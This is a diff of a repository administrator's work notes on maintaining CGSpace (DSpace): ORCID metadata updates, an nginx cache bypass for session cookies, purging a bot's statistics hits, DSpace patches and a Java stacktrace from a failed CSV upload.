$ ./ilri/update-orcids.py -i ~/src/git/cgspace-submission-guidelines/content/terms/cg-creator-identifier/cg-creator-identifier.txt -db dspace -u dspace -p 'fuuu' -m 247 -d
Connected to database.
Fixed 9 occurences of: ADEBOWALE AD AKANDE: 0000-0002-6521-3272
Fixed 43 occurences of: Alamu Emmanuel Oladeji (PhD, FIFST, MNIFST): 0000-0001-6263-1359
Fixed 3 occurences of: Alessandra Galie: 0000-0001-9868-7733
Fixed 1 occurences of: Amanda De Filippo: 0000-0002-1536-3221
...
```
## 2022-09-29
- I've been checking the size of the nginx proxy cache the last few days and it always seems to hover around 14,000 entries and 385MB:
```console
# find /var/cache/nginx/rest_cache/ -type f | wc -l
14202
# du -sh /var/cache/nginx/rest_cache
384M /var/cache/nginx/rest_cache
```
- Also on that note I'm trying to implement a workaround for a potential caching issue that causes MEL to not be able to update items on DSpace Test
- I *think* we might need to allow requests with a JSESSIONID to bypass the cache, but I have to verify with Salem
- We can do this with an nginx map:
```console
# Check if the JSESSIONID cookie is present and contains a 32-character hex
# value, which would mean that a user is actively attempting to re-use their
# Tomcat session. Then we set the $active_user_session variable and use it
# to bypass the nginx proxy cache in REST requests.
map $cookie_jsessionid $active_user_session {
# requests with an empty key are not evaluated by limit_req
# see: http://nginx.org/en/docs/http/ngx_http_limit_req_module.html
default '';
'~[A-Z0-9]{32}' 1;
}
```
- Then in the location block where we do the proxy cache:
```console
# Don't cache when user Shift-refreshes (Cache-Control: no-cache) or
# when a client has an active session (see the $cookie_jsessionid map).
proxy_cache_bypass $http_cache_control $active_user_session;
proxy_no_cache $http_cache_control $active_user_session;
```
- I found one client making 10,000 requests using a Windows 98 user agent:
```console
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
```
- They all come from one IP address (129.227.149.43) in Hong Kong
- The IP belongs to a hosting provider called Zenlayer
- I will add this IP to the nginx bot networks and purge its hits
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ip -p
Purging 33027 hits from 129.227.149.43 in statistics
Total number of bot hits purged: 33027
```
- So it seems we've seen this bot before and the total number is much higher than the 10,000 this month
- I had a call with Salem and we verified that the nginx cache bypass for clients who provide a JSESSIONID fixes their issue with updating items/bitstreams from MEL
- The issue was that they delete all metadata and bitstreams, then add them again to make sure everything is up to date, and in that process they also re-request the item with all expands to get the bitstreams, which ends up getting cached and then they try to delete the old bitstream
- I also noticed that someone made a [pull request to enable POSTing bitstreams to a particular bundle](https://github.com/DSpace/DSpace/pull/8343) and it works, so that's awesome!
## 2022-09-30
- I applied [the patch for POSTing bitstreams to other bundles](https://github.com/DSpace/DSpace/pull/8343) on CGSpace
- Testing a few other DSpace 6.4 patches on DSpace Test:
- [DS-3791 Make sure the "yearDifference" takes into account that a gap of 10 year contains 11 years](https://github.com/DSpace/DSpace/pull/1901)
- [DS-3873 Limit the usage of PDFBoxThumbnail to PDFs](https://github.com/DSpace/DSpace/pull/2501)
- [Reduce itemCounter init](https://github.com/DSpace/DSpace/pull/2161)
- [ImageMagick: Only execute "identify" on first page](https://github.com/DSpace/DSpace/pull/2201)
- [DS-3881: Show no total results on search-filter](https://github.com/DSpace/DSpace/pull/2371)
- [pass value instead of qualifier to method](https://github.com/DSpace/DSpace/pull/2699)
- [dspace-api: check for null AND empty qualifier in findByElement()](https://github.com/DSpace/DSpace/pull/7993)
- [Avoid exporting mapped Item more than once](https://github.com/DSpace/DSpace/pull/7995)
- [[DS-4574] v. 6 - Upgrade DBCP2 dependency](https://github.com/DSpace/DSpace/pull/3162)
- [bump up pdfbox version on 6.x to match main branch](https://github.com/DSpace/DSpace/pull/2742)
<!-- vim: set sw=2 ts=2: -->

776
content/posts/2022-10.md Normal file
View File

@ -0,0 +1,776 @@
---
title: "October, 2022"
date: 2022-10-01T19:45:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-10-01
- Start a harvest on AReS last night
- Yesterday I realized how to use [GraphicsMagick with im4java](https://im4java.sourceforge.net/docs/dev-guide.html) and I want to re-visit some of my thumbnail tests
- I'm also interested in libvips support via jVips, though last time I checked it was only for Java 8
- I filed [an issue to ask about Java 11+ support](https://github.com/criteo/JVips/issues/141)
<!--more-->
## 2022-10-03
- Make two pull requests for DSpace 7.x
- [Update PDFBox dependency to version 2.0.27](https://github.com/DSpace/DSpace/pull/8503)
- [Update Apache commons-dbcp2 and commons-pool2 dependencies](https://github.com/DSpace/DSpace/pull/8504)
- Udana had asked me about their RSS feed and it not showing the latest publications in his email inbox
- He is using this feed from FeedBurner: https://feeds.feedburner.com/iwmi-cgspace
- I don't have access to the FeedBurner configuration, but I looked at the [raw feed](https://gist.github.com/alanorth/0c518fc571f450f8cc353c42cbdd277c) and see it's just getting all the items in the IWMI community
- This OpenSearch query should do the same: `https://cgspace.cgiar.org/open-search/discover?scope=10568/16814&query=*&sort_by=3&order=DESC`
- The `sort_by=3` corresponds to `webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date` in dspace.cfg
- Peter sent me a CSV file a few days ago that he was unable to upload to CGSpace
- The stacktrace from the error he was getting was:
```console
Java stacktrace: java.lang.ClassCastException: org.apache.cocoon.servlet.multipart.PartInMemory cannot be cast to org.dspace.app.xmlui.cocoon.servlet.multipart.DSpacePartOnDisk
at org.dspace.app.xmlui.aspect.administrative.FlowMetadataImportUtils.processUploadCSV(FlowMetadataImportUtils.java:116)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.mozilla.javascript.MemberBox.invoke(MemberBox.java:155)
at org.mozilla.javascript.NativeJavaMethod.call(NativeJavaMethod.java:243)
at org.mozilla.javascript.Interpreter.interpretLoop(Interpreter.java:3237)
at org.mozilla.javascript.Interpreter.interpret(Interpreter.java:2394)
at org.mozilla.javascript.InterpretedFunction.call(InterpretedFunction.java:162)
at org.mozilla.javascript.ContextFactory.doTopCall(ContextFactory.java:393)
at org.mozilla.javascript.ScriptRuntime.doTopCall(ScriptRuntime.java:2834)
at org.mozilla.javascript.InterpretedFunction.call(InterpretedFunction.java:160)
at org.mozilla.javascript.Context.call(Context.java:538)
at org.mozilla.javascript.ScriptableObject.callMethod(ScriptableObject.java:1833)
at org.mozilla.javascript.ScriptableObject.callMethod(ScriptableObject.java:1803)
at org.apache.cocoon.components.flow.javascript.fom.FOM_JavaScriptInterpreter.handleContinuation(FOM_JavaScriptInterpreter.java:698)
at org.apache.cocoon.components.treeprocessor.sitemap.CallFunctionNode.invoke(CallFunctionNode.java:94)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.SelectNode.invoke(SelectNode.java:82)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.buildPipeline(ConcreteTreeProcessor.java:186)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.buildPipeline(TreeProcessor.java:260)
at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:107)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.SelectNode.invoke(SelectNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.buildPipeline(ConcreteTreeProcessor.java:186)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.buildPipeline(TreeProcessor.java:260)
at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:107)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.buildPipeline(ConcreteTreeProcessor.java:186)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.buildPipeline(TreeProcessor.java:260)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:277)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy190.setup(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:411)
at sun.reflect.GeneratedMethodAccessor331.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy189.process(Unknown Source)
at org.apache.cocoon.components.treeprocessor.sitemap.SerializeNode.invoke(SerializeNode.java:147)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
at org.apache.cocoon.servlet.RequestProcessor.process(RequestProcessor.java:351)
at org.apache.cocoon.servlet.RequestProcessor.service(RequestProcessor.java:169)
at org.apache.cocoon.sitemap.SitemapServlet.service(SitemapServlet.java:84)
